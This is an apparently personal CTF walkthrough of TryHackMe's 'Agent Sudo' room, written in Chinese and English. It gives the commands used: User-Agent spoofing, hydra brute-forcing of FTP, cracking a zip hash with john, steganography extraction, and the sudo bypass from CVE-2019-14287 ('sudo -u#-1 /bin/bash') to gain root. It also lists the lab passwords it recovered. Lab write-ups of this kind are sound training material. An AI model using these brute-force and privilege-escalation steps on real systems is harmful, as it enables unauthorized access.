【THM】Agent Sudo-Practice

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/agentsudoctf

Difficulty: Easy

Welcome to another THM exclusive CTF room. Your task is simple, capture the flags just like the other CTF room. Have Fun!

Task 2 Enumerate

image-20231112152110941

访问80端口

image-20231112152235266

image-20231112152309914

image-20231112152323871

直接用hackbar改User-agent头

一开始用R

image-20231112152425490

后面试出来C

image-20231112152408680

Task 3 Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

FTP password

1
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.21.54/

image-20231112153139976

得到密码crystal

1
2
mget *
#下载所有文件

image-20231112153335796

image-20231112153443424

1
exiftool cutie.jpg

image-20231112153633621

It mentions a warning: Trailer data after PNG IEND chunk

Let’s dump the file to hex format by using xxd.

1
xxd cutie.png

image-20231112154111733

1
binwalk -e cutie.png --run-as=root

image-20231112154154551

We can use the zip2john tool to convert the zip to a format suitable for john

1
2
3
zip2john 8702.zip > hash.txt

john hash.txt

image-20231112154702218

image-20231112154714335

或者命令行

1
7z e 8702.zip

image-20231112154855923

Area51

image-20231112155606729

image-20231112155553026

hackerrules!

Task 4 Capture the user flag

image-20231112160007726

Exit the SSH service, and copy the jpg file from the SSH service to your system with the following command:

1
sudo scp james@10.10.21.54:Alien_autospy.jpg ~/

What is the incident of the photo called?

用谷歌搜索

image-20231112161537516Roswell alien autopsy

Task 5 Privilege escalation

Enough with the extraordinary stuff? Time to get real.

重新登入ssh服务

image-20231112161812660

Checking out james’ privileges

(ALL, !root) /bin/bash

网上搜

https://www.exploit-db.com/exploits/47502

1
CVE : 2019-14287

This has the following CVE number: CVE-2019–14287. It allows us to get root access by running:

1
sudo -u#-1 /bin/bash

image-20231112162259497

(Bonus) Who is Agent R?

DesKel